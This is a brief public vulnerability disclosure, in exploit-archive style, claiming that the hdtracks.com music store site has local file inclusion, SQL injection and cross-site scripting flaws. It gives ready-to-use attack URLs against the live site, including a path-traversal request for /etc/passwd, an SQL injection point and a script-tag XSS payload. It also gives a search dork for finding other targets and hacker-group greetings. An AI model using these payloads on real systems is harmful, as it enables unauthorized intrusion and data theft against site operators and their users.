HDTRACKS suffers from cross site scripting, local file inclusion and remote SQL injection vulnerabilities.
b800801f1da0899e3a95377d1f7d63927c5c2e38a1ee561533c5d317d7f85266
TITLE: HDTRACKS Local FIle Inclusion and XSS and SQLi
vendor: HDTRACKS
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
https://facebook.com/r007k17w
Google Dork: © HDtracks 2007 - 2011
-------------------------------------------------------------------------------------------------------------------------------------------
DEMO:
LFI:
1. https://www.hdtracks.com/index.php?file=[LFI]
https://www.hdtracks.com/index.php?file=../../../../../../../../../../../../etc/passwd%00
SQLi:
1.https://www.hdtracks.com/index.php?file=artistdetail&id=4818[SQLi]
XSS:
1.https://www.hdtracks.com/index.php?file="><script>alert(document.domain)</script>
---------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6( N17|<
),1nJ3ct0r t3am and all my friends
----------------------------------------------------------------------------------------------------------